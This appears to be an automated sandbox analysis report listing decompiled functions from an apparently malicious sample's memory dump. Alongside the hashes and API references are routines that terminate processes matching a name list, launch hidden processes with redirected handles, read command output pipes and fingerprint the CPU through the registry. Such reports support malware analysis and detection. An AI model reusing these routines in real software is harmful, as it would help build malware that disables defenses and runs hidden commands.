Opcode Fuzzy Hash: e46040dec5b6a66fdbf3e8ab3651499f9770bff48e6e8c96969f74010dd987ad
Instruction Fuzzy Hash: 582138312513117BE224E724DC4AF7F777CDB40B51F500228F606660C1EBE87924C6EA

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D48A8 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D48A8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x0f1d48a8
0x0f1d48a8
0x0f1d48b0
0x0f1d48b0
0x0f1d48b5
0x0f1d48bd
0x0f1d48cb
0x0f1d48cf
0x0f1d48d4
0x0f1d48e1
0x0f1d48e1
0x0f1d48cf
0x0f1d48eb
0x0f1d48ec
0x0f1d48ec
0x0f1d48f2
0x00000000
0x00000000
0x0f1d48f4
0x0f1d48f4
0x0f1d48fa
0x0f1d4900
0x0f1d4900
0x0f1d4905
0x0f1d48a4
0x0f1d48b0
0x00000000
0x00000000
0x00000000
0x0f1d48b0
0x0f1d4909
0x0f1d4913
0x0f1d4913
0x0f1d491a
0x0f1d4922
0x0f1d48b0
0x0f1d48b5
0x0f1d48bd
0x0f1d48cb
0x0f1d48cf
0x0f1d48d4
0x0f1d48e1
0x0f1d48e1
0x0f1d48cf
0x0f1d48eb
0x0f1d48ec
0x0f1d48ec
0x0f1d48ef

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F1D48B5
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F1D48C5
TerminateProcess.KERNEL32(00000000,00000000), ref: 0F1D48D4
CloseHandle.KERNEL32(00000000), ref: 0F1D48E1
Process32NextW.KERNEL32(?,00000000), ref: 0F1D48FA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D4913
FindCloseChangeNotification.KERNEL32(?), ref: 0F1D491A

Strings

i)w, xrefs: 0F1D48B5

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
String ID: i)w
API String ID: 3573210778-1280834553
Opcode ID: adfd6a3652ff7de3ef5f9032993131c8a5988600de89f6ddb42c9cc34bd3717c
Instruction ID: 713e30890df327db06513bacfdae53900337b40aa9d9ecb2d455b5513095dc3e
Opcode Fuzzy Hash: adfd6a3652ff7de3ef5f9032993131c8a5988600de89f6ddb42c9cc34bd3717c
Instruction Fuzzy Hash: CC012D36242211AFD721DFA1EC44BAA737CEF85752F110034FD0997043DB75E8648BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D7C10 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D7C10(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

0x0f1d7c11
0x0f1d7c1d
0x0f1d7c29
0x0f1d7c29
0x0f1d7c2f
0x0f1d7c3b
0x0f1d7c3b
0x0f1d7c41
0x0f1d7c4d
0x0f1d7c4d
0x0f1d7c53
0x0f1d7c5f
0x0f1d7c5f
0x0f1d7c65
0x0f1d7c71
0x0f1d7c71
0x0f1d7c77
0x0f1d7c83
0x0f1d7c83
0x0f1d7c89
0x0f1d7c95
0x0f1d7c95
0x0f1d7c9b
0x0f1d7ca7
0x0f1d7ca7
0x0f1d7cad
0x0f1d7cb9
0x0f1d7cb9
0x0f1d7cc2
0x00000000
0x0f1d7cd1
0x0f1d7cd5

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7C29
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7C3B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F1D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7C4D
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7C5F
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7C71
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7C83
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7C95
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7CA7
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F1D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7CB9
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7CD1

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 6eaafb2815cff516dc132abe9cea442316f1b9a7ed554e0dd357b8a90129e24c
Instruction ID: 26456b01bbd5802efe6652fe7bd46de9bf21abf6b97545ba17cf6aa42a612325
Opcode Fuzzy Hash: 6eaafb2815cff516dc132abe9cea442316f1b9a7ed554e0dd357b8a90129e24c
Instruction Fuzzy Hash: C321BF30280B05AEE7766A15DD0AFA6B6F1BF40B45F654928F2C1244F1CBF57499EF08

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D2890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0F1D2890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t9;
				signed int _t14;
				void* _t18;
				void* _t19;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t24;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t9 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t34 = _t9;
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0F1D3030(0, _t34, _t35); // executed
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0F1D3030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0); // executed
					_v16 = _t18;
					if(_t18 != 0) {
						_t19 = MapViewOfFile(_t18, _t37, 0, 0, 0); // executed
						_t38 = _t19;
						if(_t38 != 0) {
							_t23 = E0F1D3030(0, _t34, _t38); // executed
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6, executed
								E0F1D82A0(_t29, _t5); // executed
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t24 = E0F1D2830(_v12, _t38, _v8); // executed
							_t28 = _t24;
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

0x0f1d2890
0x0f1d2899
0x0f1d289b
0x0f1d28ab
0x0f1d28b1
0x0f1d28b6
0x0f1d28f9
0x0f1d2901
0x0f1d28b8
0x0f1d28c0
0x0f1d28c3
0x0f1d28ca
0x0f1d28cf
0x0f1d28d0
0x0f1d28d8
0x0f1d28e5
0x0f1d28eb
0x0f1d28f0
0x0f1d290a
0x0f1d2910
0x0f1d2914
0x0f1d2916
0x0f1d291d
0x0f1d291f
0x0f1d2920
0x0f1d2920
0x0f1d2923
0x0f1d2926
0x0f1d292b
0x0f1d292b
0x0f1d292e
0x0f1d2937
0x0f1d293f
0x0f1d2942
0x0f1d2942
0x0f1d2951
0x0f1d2954
0x0f1d295e
0x0f1d28f2
0x0f1d28f3
0x00000000
0x0f1d28f3
0x0f1d28f0

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,772D82B0,00000000,?,?,0F1D2C02), ref: 0F1D28AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0F1D2C02), ref: 0F1D28BA
CreateFileMappingW.KERNELBASE(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F1D2C02), ref: 0F1D28E5
CloseHandle.KERNEL32(00000000,?,?,0F1D2C02), ref: 0F1D28F3
MapViewOfFile.KERNEL32(00000000,772D82B1,00000000,00000000,00000000,?,?,0F1D2C02), ref: 0F1D290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F1D2C02), ref: 0F1D2942
CloseHandle.KERNEL32(?,?,?,0F1D2C02), ref: 0F1D2951
CloseHandle.KERNEL32(00000000,?,?,0F1D2C02), ref: 0F1D2954

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: 6278bd6c9f27bc05a99763ba70e08f6918a2aea3d0877e0e56ce4b30d47df1d7
Instruction ID: 0c422ed2ac89dd4ea51d86b11a97abceeeb7ef025823bff32b3edf402618cb2d
Opcode Fuzzy Hash: 6278bd6c9f27bc05a99763ba70e08f6918a2aea3d0877e0e56ce4b30d47df1d7
Instruction Fuzzy Hash: E22138B1A022297FE310AB749C85F7FB77CDF45676F004224FC11E2282E738AC2145A1

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D4C40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0F1D4C40(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				int _t20;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0F1D9010( &_v92, 0, 0x44);
				_t15 =  *0xf1e2a6c; // 0x74c
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xf1e2a68; // 0x754
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				_t20 = CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20); // executed
				if(_t20 != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x0f1d4c4c
0x0f1d4c52
0x0f1d4c54
0x0f1d4c59
0x0f1d4c5e
0x0f1d4c66
0x0f1d4c69
0x0f1d4c6c
0x0f1d4c71
0x0f1d4c78
0x0f1d4c7d
0x0f1d4c88
0x0f1d4c9f
0x0f1d4ca7
0x0f1d4cbd
0x0f1d4cc8
0x0f1d4ca9
0x0f1d4cb3
0x0f1d4cb3

APIs

_memset.LIBCMT ref: 0F1D4C59
CreateProcessW.KERNEL32 ref: 0F1D4C9F
GetLastError.KERNEL32(?,?,00000000), ref: 0F1D4CA9
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F1D4CBD
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F1D4CC2

Strings

D, xrefs: 0F1D4C88

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: b970bbab1fb507c92864173efbbd34a58a550d5ae2f2d491410836e07770e855
Instruction ID: 0ec42c8cd6a932b043f4126adcfe6063b95f4d0be0c70d60195be0402885f8ae
Opcode Fuzzy Hash: b970bbab1fb507c92864173efbbd34a58a550d5ae2f2d491410836e07770e855
Instruction Fuzzy Hash: B5016171E40318ABDB20DBA49C05BDE7BB8EF04711F100216F608FA180E7B525648B98

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D72B0 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D72B0(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x0f1d72c6
0x0f1d72d0
0x0f1d7324
0x0f1d72d2
0x0f1d72d5
0x0f1d72e7
0x0f1d72ef
0x0f1d7306
0x0f1d730f
0x0f1d731b
0x0f1d72f1
0x0f1d72f4
0x0f1d72f7
0x0f1d7303
0x0f1d7303
0x0f1d72ef

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,0000060C,?,0F1D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F1D72C6
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000080,?,?,0F1D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F1D72E7
RegCloseKey.KERNEL32(?,?,0F1D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F1D72F7
GetLastError.KERNEL32(?,0F1D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F1D7306
RegCloseKey.ADVAPI32(?,?,0F1D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F1D730F

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: ce93e1db21ad592e52cd46c61c60d789bd0809c9f9983cf2794dfb0107d09d2f
Instruction ID: cd61d4bacf8fdcd601047f12447ecac6f2487718f622825c2ae8b70ac6ff9661
Opcode Fuzzy Hash: ce93e1db21ad592e52cd46c61c60d789bd0809c9f9983cf2794dfb0107d09d2f
Instruction Fuzzy Hash: 64011A3260212DFBCB11DF94ED09D9ABB78EF08362B004166FD05D6111D7329A34ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D2830 Relevance: 4.5, APIs: 3, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0F1D2830(WCHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				void* _t3;
				int _t7;
				void* _t9;
				void* _t14;
				struct _OVERLAPPED* _t17;

				_push(__ecx);
				_t9 = __edx; // executed
				_t3 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_t14 = _t3;
				_t17 = 0;
				if(_t14 != 0xffffffff) {
					if(_t9 == 0) {
						L3:
						_t17 = 1;
					} else {
						_t7 = WriteFile(_t14, _t9, _a4,  &_v8, 0); // executed
						if(_t7 != 0) {
							goto L3;
						}
					}
					FindCloseChangeNotification(_t14); // executed
				}
				return _t17;
			}

0x0f1d2833
0x0f1d284a
0x0f1d284c
0x0f1d2852
0x0f1d2854
0x0f1d2859
0x0f1d285d
0x0f1d2873
0x0f1d2873
0x0f1d285f
0x0f1d2869
0x0f1d2871
0x00000000
0x00000000
0x0f1d2871
0x0f1d2879
0x0f1d2879
0x0f1d2887

APIs

CreateFileW.KERNEL32(0F1D2C02,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000000,0F1D2C02,?,0F1D293C,?), ref: 0F1D284C
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,0F1D293C,?,?,?,?,0F1D2C02), ref: 0F1D2869
FindCloseChangeNotification.KERNEL32(00000000,?,0F1D293C,?,?,?,?,0F1D2C02), ref: 0F1D2879

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID:
API String ID: 3805958096-0
Opcode ID: 8c387305f790a81142dae0722954a4a421955e4fe75f219ab248f29094780e8f
Instruction ID: c317f0567cbdf9c0973e9e8a8d4d4d5f419993f522dabd017accefad767be184
Opcode Fuzzy Hash: 8c387305f790a81142dae0722954a4a421955e4fe75f219ab248f29094780e8f
Instruction Fuzzy Hash: 94F0A77234121477E6304A96AC8AFBBB6BCDB86B71F504225FE18E71C1D7B4AC2142A4

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D4DE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D4DE0(void* __ebx, CHAR* __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				CHAR* _v12;
				long _v16;
				void _v4112;
				char* _t18;
				char* _t21;
				intOrPtr _t24;
				char _t26;
				void* _t31;
				void* _t33;
				void* _t38;

				E0F1D8990(0x100c);
				_v8 = __edx;
				_v12 = __ecx;
				while(1) {
					L1:
					_t18 = ReadFile( *0xf1e2a70,  &_v4112, 0x1000,  &_v16, 0); // executed
					_t24 = _v4112;
					_t33 =  &_v4112;
					_t21 = _t18;
					if(_t24 == 0) {
						break;
					}
					_t38 = _t33 - "Can\'t find server";
					do {
						_t18 = "Can\'t find server";
						if(_t24 == 0) {
							goto L9;
						} else {
							while(1) {
								_t26 =  *_t18;
								if(_t26 == 0) {
									goto L1;
								}
								_t31 =  *((char*)(_t38 + _t18)) - _t26;
								if(_t31 != 0) {
									L8:
									if( *_t18 == 0) {
										goto L1;
									} else {
										goto L9;
									}
								} else {
									_t18 =  &(_t18[1]);
									if( *((intOrPtr*)(_t38 + _t18)) != _t31) {
										continue;
									} else {
										goto L8;
									}
								}
								goto L10;
							}
							goto L1;
						}
						goto L10;
						L9:
						_t24 =  *((intOrPtr*)(_t33 + 1));
						_t33 = _t33 + 1;
						_t38 = _t38 + 1;
					} while (_t24 != 0);
					break;
				}
				L10:
				if(_t21 != 0 && _v16 != 0) {
					return E0F1D4CD0( &_v4112, _v12, _v8);
				}
				return _t18;
			}

0x0f1d4de8
0x0f1d4def
0x0f1d4df2
0x0f1d4df6
0x0f1d4df6
0x0f1d4e0e
0x0f1d4e14
0x0f1d4e1a
0x0f1d4e20
0x0f1d4e24
0x00000000
0x00000000
0x0f1d4e28
0x0f1d4e30
0x0f1d4e30
0x0f1d4e37
0x00000000
0x0f1d4e40
0x0f1d4e40
0x0f1d4e40
0x0f1d4e44
0x00000000
0x00000000
0x0f1d4e4d
0x0f1d4e4f
0x0f1d4e57
0x0f1d4e5a
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d4e51
0x0f1d4e51
0x0f1d4e55
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d4e55
0x00000000
0x0f1d4e4f
0x00000000
0x0f1d4e40
0x00000000
0x0f1d4e5c
0x0f1d4e5c
0x0f1d4e5f
0x0f1d4e60
0x0f1d4e61
0x00000000
0x0f1d4e30
0x0f1d4e65
0x0f1d4e6a
0x00000000
0x0f1d4e83
0x0f1d4e89

APIs

ReadFile.KERNEL32(?,00001000,00000000,00000000,00000000,00000000,00000000,?,0F1D5034), ref: 0F1D4E0E

Strings

Can't find server, xrefs: 0F1D4E28, 0F1D4E30

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: Can't find server
API String ID: 2738559852-1141070784
Opcode ID: 12f3b4e76a102c1b7ce691cf0c5a693be96daf3a09bb55296c51f491dd6eccb2
Instruction ID: 1def96aa4f2ac2578387539cbc17712e90901e9106e42360258bf64c090cb1d2
Opcode Fuzzy Hash: 12f3b4e76a102c1b7ce691cf0c5a693be96daf3a09bb55296c51f491dd6eccb2
Instruction Fuzzy Hash: CD115B34C00298ABEF32CA5499107EBBBB8DF86306F5881D5F88557202E3743969C790

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D4BF0 Relevance: 3.0, APIs: 2, Instructions: 25
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t10;

				_v16 = 1;
				_v12 = _a8;
				_t10 = CreateThread(0, 0, E0F1D4950, 0, 0, 0); // executed
				_v8 = _t10;
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				return _v16;
			}

0x0f1d4bf6
0x0f1d4c00
0x0f1d4c1c
0x0f1d4c22
0x0f1d4c29
0x0f1d4c2f
0x0f1d4c2f
0x0f1d4c3b

APIs

CreateThread.KERNEL32 ref: 0F1D4C1C
FindCloseChangeNotification.KERNEL32(00000000), ref: 0F1D4C2F

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: ChangeCloseCreateFindNotificationThread
String ID:
API String ID: 4060959955-0
Opcode ID: 8f71d783879672441008eaee29926577b1b99a4bd485ec905f1828e3a2559728
Instruction ID: e4fb7bae7aa50a890cfc00d297919ed1e76ce9f3ef8e10c405413bf7288cf05a
Opcode Fuzzy Hash: 8f71d783879672441008eaee29926577b1b99a4bd485ec905f1828e3a2559728
Instruction Fuzzy Hash: 65F03934A85308FBD714DFA0D80AB8CB774EB04705F20809AF9016B2C1D7B566A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D6420 Relevance: 2.5, APIs: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

